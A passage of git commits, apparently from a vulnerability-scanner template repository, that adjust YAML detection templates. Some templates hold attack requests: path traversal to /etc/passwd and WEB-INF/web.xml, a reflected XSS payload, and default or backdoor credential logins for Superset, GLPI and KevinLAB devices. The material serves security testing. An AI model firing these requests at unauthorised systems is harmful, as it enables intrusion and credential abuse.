"https?://[\\d\\w\\{\\}\\.%]+(?:|@)[\\d\\w\\{\\}\\.]+:[\\d\\w\\{\\}\\.]+(?:|@)[\\d\\w\\{\\}\\.\\?!~#@]+" - part: body + - type: word words: - - "Content-Type: text/html" - part: header + - "https://" + - "@github.com" + condition: and + - type: status status: - 200 + + - type: word + part: header + words: + - "text/html" + negative: true \ No newline at end of file From 96c78d86954c18be64a55d4632d738ed67288429 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 00:39:30 +0530 Subject: [PATCH 1071/4083] additional negative matcher --- exposures/configs/dockerfile-hidden-disclosure.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/exposures/configs/dockerfile-hidden-disclosure.yaml b/exposures/configs/dockerfile-hidden-disclosure.yaml index e51b07e047..b5dfaf2fec 100644 --- a/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -22,4 +22,10 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + + - type: word + part: header + words: + - "text/html" + negative: true \ No newline at end of file From a957dc230c303bf51c1a1d10ece60ba521fa869f Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:51:05 +0530 Subject: [PATCH 1072/4083] Update exposures/files/snyk-ignore-file-disclosure.yaml Co-authored-by: Toufik Airane --- exposures/files/snyk-ignore-file-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/files/snyk-ignore-file-disclosure.yaml b/exposures/files/snyk-ignore-file-disclosure.yaml index e64f185bbc..4eaca359b1 100644 --- a/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/exposures/files/snyk-ignore-file-disclosure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/.snyk" + matchers-condition: and matchers: - type: word From f8a1c2c2b572e9221b8f74f211da6beac95dbd82 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:52:09 +0530 Subject: [PATCH 1073/4083] Update misconfiguration/clockwork-dashboard-exposure.yaml Co-authored-by: Toufik Airane --- misconfiguration/clockwork-dashboard-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/clockwork-dashboard-exposure.yaml b/misconfiguration/clockwork-dashboard-exposure.yaml index 6dddfa7b69..692edee2e3 100644 --- a/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/misconfiguration/clockwork-dashboard-exposure.yaml @@ -22,6 +22,7 @@ requests: - "\"time\"" part: body condition: and + - type: word words: - "application/json" From 327819a037fc78b3bd9cd13582586347511a69d6 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 00:52:24 +0530 Subject: [PATCH 1074/4083] Update misconfiguration/clockwork-dashboard-exposure.yaml Co-authored-by: Toufik Airane --- misconfiguration/clockwork-dashboard-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/clockwork-dashboard-exposure.yaml b/misconfiguration/clockwork-dashboard-exposure.yaml index 692edee2e3..a8a9417d5e 100644 --- a/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/misconfiguration/clockwork-dashboard-exposure.yaml @@ -11,6 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/__clockwork/latest" + matchers-condition: and matchers: - type: word From 2788c9429f4722e0f3931b2cff2eed7b2606207a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 01:03:06 +0530 Subject: [PATCH 1075/4083] matchers update --- .../apache/apache-superset-default-credentials.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index 96d4d28195..a36fbd88c6 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -13,17 +13,19 @@ requests: - "{{BaseURL}}/login/" headers: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + body: 'username=admin&password=admin' matchers-condition: and matchers: - type: word words: - - "Redirecting..." - - "/" + - 'Redirecting...' + - '

    Redirecting...' part: body condition: and - type: status status: - - 200 + - 302 From 4795c084e145c79e0411e71daca44f0b9c83c933 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 23 Jul 2021 15:18:51 -0500 Subject: [PATCH 1076/4083] Update nginx-config.yaml fixes a false positive --- exposures/configs/nginx-config.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/exposures/configs/nginx-config.yaml b/exposures/configs/nginx-config.yaml index f4c8f226b3..9975df4454 100644 --- a/exposures/configs/nginx-config.yaml +++ b/exposures/configs/nginx-config.yaml @@ -2,7 +2,7 @@ id: nginx-config info: name: Nginx Config file disclosure - author: sheikhrishad + author: sheikhrishad,geeknik severity: info tags: config,exposure,nginx @@ -13,6 +13,10 @@ requests: matchers-condition: and matchers: + - type: word + words: + - "html>" + negative: true - type: word words: - "server" @@ -22,4 +26,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From ebab9b8ae2abd12df5dfd6986970f2ad778281e8 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 24 Jul 2021 02:15:43 +0530 Subject: [PATCH 1077/4083] Update exposed-panels/mantis-detect.yaml Co-authored-by: Toufik Airane --- exposed-panels/mantis-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/mantis-detect.yaml b/exposed-panels/mantis-detect.yaml index 2c5d6524e4..05b54cb431 100644 --- a/exposed-panels/mantis-detect.yaml +++ b/exposed-panels/mantis-detect.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/login_page.php" + matchers: - type: word words: From ef0d5da7ce21f608316c7d66cd3e9f650242c4fc Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 02:16:22 +0530 Subject: [PATCH 1078/4083] Update mantis-detect.yaml --- exposed-panels/mantis-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/exposed-panels/mantis-detect.yaml b/exposed-panels/mantis-detect.yaml index 05b54cb431..eee362e684 100644 --- a/exposed-panels/mantis-detect.yaml +++ b/exposed-panels/mantis-detect.yaml @@ -4,7 +4,7 @@ info: name: Mantis portal detection author: makyotox severity: info - tags: panel + tags: panel,mantis requests: - method: GET @@ -15,5 +15,4 @@ requests: - type: word words: - "MantisBT" - condition: and part: body From 15b6a9eac480f9d214bece4ed69a8e2c3942ba7b Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 02:49:55 +0530 Subject: [PATCH 1079/4083] Added CSRF handling --- .../apache-superset-default-credentials.yaml | 46 +++++++++++++++---- 1 file changed, 38 insertions(+), 8 deletions(-) diff --git a/default-logins/apache/apache-superset-default-credentials.yaml b/default-logins/apache/apache-superset-default-credentials.yaml index a36fbd88c6..58bc528ac9 100644 --- a/default-logins/apache/apache-superset-default-credentials.yaml +++ b/default-logins/apache/apache-superset-default-credentials.yaml @@ -8,23 +8,53 @@ info: tags: apache, default-login requests: - - method: POST - path: - - "{{BaseURL}}/login/" - headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Connection: close + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 + Accept-Language: en-US,en;q=0.9 - body: 'username=admin&password=admin' + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Content-Length: 152 + Cache-Control: max-age=0 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + Accept-Encoding: gzip, deflate + Accept-Language: en-IN,en;q=0.9 + Connection: close + + csrf_token={{csrff_token}}&username=admin&password=admin + + extractors: + - type: regex + name: csrff_token + group: 1 + part: body + internal: true + regex: + - 'value="(.*?)">' matchers-condition: and matchers: - type: word + part: body + condition: and words: - 'Redirecting...' - '

    Redirecting...' - part: body - condition: and + + - type: word + part: header + words: + - 'session' - type: status status: From 19533bcc08e25828a0ed73065b97978cda22dd92 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 02:53:11 +0530 Subject: [PATCH 1080/4083] removed content type check to avoid valid matches --- exposures/configs/appsec-yml-disclosure.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/exposures/configs/appsec-yml-disclosure.yaml b/exposures/configs/appsec-yml-disclosure.yaml index 8276c7880a..d036de812b 100644 --- a/exposures/configs/appsec-yml-disclosure.yaml +++ b/exposures/configs/appsec-yml-disclosure.yaml @@ -23,11 +23,6 @@ requests: part: body condition: and - - type: word - part: header - words: - - application/yaml - - type: status status: - 200 From 9788ebbf276c010480416a6bd78cd31a8bf06414 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 02:54:09 +0530 Subject: [PATCH 1081/4083] more matcher updates --- exposures/configs/hp-ilo-serial-key-disclosure.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/exposures/configs/hp-ilo-serial-key-disclosure.yaml b/exposures/configs/hp-ilo-serial-key-disclosure.yaml index 389c867695..60989a2210 100644 --- a/exposures/configs/hp-ilo-serial-key-disclosure.yaml +++ b/exposures/configs/hp-ilo-serial-key-disclosure.yaml @@ -22,11 +22,6 @@ requests: part: body condition: and - - type: word - words: - - "Content-Type: text/html" - part: header - - type: status status: - 200 From 1ea3b8a8bff5cc4d045c5281d5de26c848d23ca1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 03:03:31 +0530 Subject: [PATCH 1082/4083] matcher updates --- .../kubernetes-kustomization-disclosure.yaml | 21 +++++++++++-------- exposures/files/php-user-ini-disclosure.yaml | 2 +- 2 files changed, 13 insertions(+), 10 deletions(-) diff --git a/exposures/configs/kubernetes-kustomization-disclosure.yaml b/exposures/configs/kubernetes-kustomization-disclosure.yaml index f128f9c240..3d11c2d40d 100644 --- a/exposures/configs/kubernetes-kustomization-disclosure.yaml +++ b/exposures/configs/kubernetes-kustomization-disclosure.yaml @@ -14,19 +14,22 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "(?m)^\\s*apiVersion\\s*:\\s*kustomize\\.config" - - "(?mi)^\\s*kind\\s*:\\s*Kustomization" - - "(?m)^\\scommonLabels\\s*:" - - "(?m)^\\sresources\\s*:" - - "(?m)^\\snamespace\\s*:" + - type: word part: body + condition: or + words: + - "apiVersion:" + - "resources:" + - "namespace:" + - "commonLabels:" + - "Kustomization" - type: word + part: body + condition: or words: - - "Content-Type: application/yaml" - part: header + - "yaml" + - "yml" - type: status status: diff --git a/exposures/files/php-user-ini-disclosure.yaml b/exposures/files/php-user-ini-disclosure.yaml index 8994cedb7b..0f225008d4 100644 --- a/exposures/files/php-user-ini-disclosure.yaml +++ b/exposures/files/php-user-ini-disclosure.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDk severity: medium reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json - tags: exposure,files + tags: exposure,config requests: - method: GET From b1d8ab1193ff7c9fcd9df84d19f36cc734d467ea Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 03:13:09 +0530 Subject: [PATCH 1083/4083] more matchers update --- exposures/files/pyproject-disclosure.yaml | 2 +- exposures/files/snyk-ignore-file-disclosure.yaml | 2 +- misconfiguration/clockwork-dashboard-exposure.yaml | 10 +++++----- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/exposures/files/pyproject-disclosure.yaml b/exposures/files/pyproject-disclosure.yaml index d1d4399adf..27f07ab56a 100644 --- a/exposures/files/pyproject-disclosure.yaml +++ b/exposures/files/pyproject-disclosure.yaml @@ -3,7 +3,7 @@ id: pyproject-disclosure info: name: Pyproject Disclosure author: dhiyaneshDk - severity: low + severity: info reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/pyproject-disclosure.json tags: exposure,files diff --git a/exposures/files/snyk-ignore-file-disclosure.yaml b/exposures/files/snyk-ignore-file-disclosure.yaml index 4eaca359b1..4f29c69b71 100644 --- a/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/exposures/files/snyk-ignore-file-disclosure.yaml @@ -3,7 +3,7 @@ id: snyk-ignore-file-disclosure info: name: Snyk Ignore File Disclosure author: dhiyaneshDk - severity: low + severity: info reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/snyk-ignore-file-disclosure.json tags: exposure,files diff --git a/misconfiguration/clockwork-dashboard-exposure.yaml b/misconfiguration/clockwork-dashboard-exposure.yaml index a8a9417d5e..3e10886ff7 100644 --- a/misconfiguration/clockwork-dashboard-exposure.yaml +++ b/misconfiguration/clockwork-dashboard-exposure.yaml @@ -16,11 +16,11 @@ requests: matchers: - type: word words: - - "\"id\"" - - "\"version\"" - - "\"method\"" - - "\"url\"" - - "\"time\"" + - '"id":' + - '"version":' + - '"method":' + - '"url":' + - '"time":' part: body condition: and From 47ea40bc5513be6e44abe1f71f2fb6b516740c1e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 03:17:53 +0530 Subject: [PATCH 1084/4083] Update kevinlab-bems-backdoor.yaml --- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 8256687c57..e2abcec244 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -21,7 +21,7 @@ requests: Connection: close requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D - + matchers-condition: and matchers: - type: regex From 9617bc581534ed18835e46c9519ead2130e27133 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 03:25:22 +0530 Subject: [PATCH 1085/4083] matcher update --- .../nginx-merge-slashes-path-traversal.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 8b9b46a81b..4cf1d909e0 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -4,21 +4,24 @@ info: name: Nginx Merge Slashes Path Traversal author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json - tags: exposure,config + reference: | + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json + - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d + tags: exposure,config,lfi,nginx requests: - method: GET path: - - "{{BaseURL}}//////../../../etc/passwd" - - "{{BaseURL}}/static//////../../../../etc/passwd" + - "{{BaseURL}}///////../../../etc/passwd" + - "{{BaseURL}}/static///////../../../../etc/passwd" - "{{BaseURL}}///../app.js" matchers-condition: and matchers: - - type: word - words: - - "root:" + + - type: regex + regex: + - "root:[x*]:0:0:" - "app.listen" part: body condition: or From f8033758a1401c2c67dfc74958a59ca9a636f66d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 24 Jul 2021 07:18:30 +0700 Subject: [PATCH 1086/4083] Create CVE-2012-4889.yaml --- cves/2012/CVE-2012-4889.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2012/CVE-2012-4889.yaml diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml new file mode 100644 index 0000000000..bdef795d2d --- /dev/null +++ b/cves/2012/CVE-2012-4889.yaml @@ -0,0 +1,32 @@ +id: CVE-2012-4889 + +info: + name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + reference: | + - https://www.securityfocus.com/bid/52841/info + - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 + tags: cve,cve2012,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From dddd0797067d3fc5cb0a5f7c1c72c98b4b6336b0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 24 Jul 2021 07:20:53 +0700 Subject: [PATCH 1087/4083] Update CVE-2012-4889.yaml --- cves/2012/CVE-2012-4889.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml index bdef795d2d..fb12ddf851 100644 --- a/cves/2012/CVE-2012-4889.yaml +++ b/cves/2012/CVE-2012-4889.yaml @@ -1,7 +1,7 @@ id: CVE-2012-4889 info: - name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS) author: daffainfo severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. From e97e2a4f2a96118020a52fca2b5228670b09d2ad Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 24 Jul 2021 06:22:48 +0530 Subject: [PATCH 1088/4083] Template update --- cves/2021/CVE-2021-34429.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 034033aa80..ebc06a6eff 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -11,11 +11,21 @@ info: tags: cve,cve2021,jetty requests: - - method: GET - path: - - '{{BaseURL}}/%u002e/WEB-INF/web.xml' - - '{{BaseURL}}/.%00/WEB-INF/web.xml' + - raw: + - |+ + GET /%u002e/WEB-INF/web.xml HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + - |+ + GET /.%00/WEB-INF/web.xml HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) + + + unsafe: true matchers-condition: and matchers: - type: status From 62ba69390cfd6096a2782ec15afd29758c12a5e9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 10:00:22 +0530 Subject: [PATCH 1089/4083] Update CVE-2012-4889.yaml --- cves/2012/CVE-2012-4889.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml index fb12ddf851..d2ba389a72 100644 --- a/cves/2012/CVE-2012-4889.yaml +++ b/cves/2012/CVE-2012-4889.yaml @@ -8,18 +8,18 @@ info: reference: | - https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - tags: cve,cve2012,xss + tags: cve,cve2012,xss,manageengine requests: - method: GET path: - - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E" + - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '">' + - '' part: body - type: word From 07ed2eec19367161c8257ce9b3f5b79988a76534 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 10:54:35 +0530 Subject: [PATCH 1090/4083] Update glpi-default-credential.yaml --- default-logins/glpi/glpi-default-credential.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 5abebc5612..c5684b62f8 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -68,8 +68,7 @@ requests: matchers: - type: word words: - - 'GLPI - Standard Interface' + - 'GLPI - Standard Interface' - type: status status: - - 302 - - 200 + - 200 From aa1be682a759e044d3b4be340009ff01a6c91f93 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:32:06 +0530 Subject: [PATCH 1091/4083] Update glpi-default-credential.yaml --- .../glpi/glpi-default-credential.yaml | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index c5684b62f8..951b8b696c 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -4,37 +4,37 @@ info: author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. reference: https://glpi-project.org/ requests: - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Upgrade-Insecure-Requests: 1 - Connection: keep-alive - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 - - - | - POST /front/login.php HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Length: 179 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Upgrade-Insecure-Requests: 1 + Connection: keep-alive + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 - {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} + - | + POST /front/login.php HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Length: 179 + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.70 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9,ru;q=0.8,uk;q=0.7 + + {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} cookie-reuse: true redirects: true @@ -55,7 +55,7 @@ requests: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - + - type: regex name: password part: body From a2787a379d9649f0cb1928e31dd991256b033d32 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:35:35 +0530 Subject: [PATCH 1092/4083] Update CVE-2011-3315.yaml --- cves/2011/CVE-2011-3315.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2011/CVE-2011-3315.yaml b/cves/2011/CVE-2011-3315.yaml index 4a2998e643..0c38a6365b 100644 --- a/cves/2011/CVE-2011-3315.yaml +++ b/cves/2011/CVE-2011-3315.yaml @@ -4,6 +4,7 @@ info: name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal author: daffainfo severity: high + description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. reference: https://www.exploit-db.com/exploits/36256 tags: cve,cve2011,lfi,cisco From 31f62d59ce1dddcf7bd9daf3ca917167d1ae3b3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:39:47 +0530 Subject: [PATCH 1093/4083] Update CVE-2020-13117.yaml --- cves/2020/CVE-2020-13117.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index 41bc0e3875..158a9a0af5 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -5,9 +5,9 @@ info: author: gy741 severity: critical description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected. - tags: cve,cve2020,wavlink,rce,oob reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html + tags: cve,cve2020,wavlink,rce,oob requests: - raw: From 406dee74e87a15973e5cffe4536df2cbb5411b1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:42:39 +0530 Subject: [PATCH 1094/4083] Update kevinlab-device-detect.yaml --- iot/kevinlab-device-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml index 8e28c8b5ba..2f33447a4c 100644 --- a/iot/kevinlab-device-detect.yaml +++ b/iot/kevinlab-device-detect.yaml @@ -1,7 +1,7 @@ id: kevinlab-device-detect info: - name: KevinLAB Deviceas Detection + name: KevinLAB Devices Detection description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. author: gy741 severity: info From 87b4c2e98b4bdc44837fff077866a5ab86f96ea7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 24 Jul 2021 11:47:05 +0530 Subject: [PATCH 1095/4083] Update kevinlab-bems-sqli.yaml --- vulnerabilities/other/kevinlab-bems-sqli.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 8d345dfd23..781f8eb9a3 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -1,11 +1,14 @@ id: kevinlab-bems-sqli info: - name: KevinLAB BEMS (Building Energy Management System) Unauthenticated SQL Injection + name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass author: gy741 severity: high description: The application 